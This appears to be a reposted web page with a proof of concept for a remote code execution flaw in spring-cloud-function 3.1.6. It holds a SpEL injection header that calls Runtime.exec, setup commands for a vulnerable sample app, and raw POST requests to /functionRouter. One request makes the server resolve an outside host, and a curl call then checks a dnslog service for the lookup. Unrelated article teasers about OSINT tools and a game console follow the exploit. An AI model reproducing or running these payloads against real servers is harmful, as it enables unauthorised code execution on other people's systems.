Spring-Spel-0Day-Poc is spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“open -a calculator.app”)
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
find . -name “*.java”|xargs -I % cat %|grep -Eo ‘”([^” .\/=>|,:}+)'”‘”‘]{8,})”‘|sort -u|sed ‘s/”//g’
…
functionRouter
uppercase
lowercase
…
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“open -a /System/Applications/Calculator.app”)
Content-Length: 5
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName(“random87535.rce.51pwn.com”)
Content-Length: 5
51pwn
curl -v -H “user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0” ‘https://51pwn.com/dnslog?q=random87535.rce.51pwn.com’
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Microsoft has officially unveiled its latest gaming venture, Project Helix, a next-generation gaming console set…
In the digital era, an email address can reveal much more than just a contact…
Mr.Holmes is an OSINT (Open Source Intelligence) tool designed to gather valuable information from public…
WhatWeb is the perfect name for this tool. It answers the question, “What is that…
In an era dominated by messaging apps, WhatsApp has become a key platform for personal…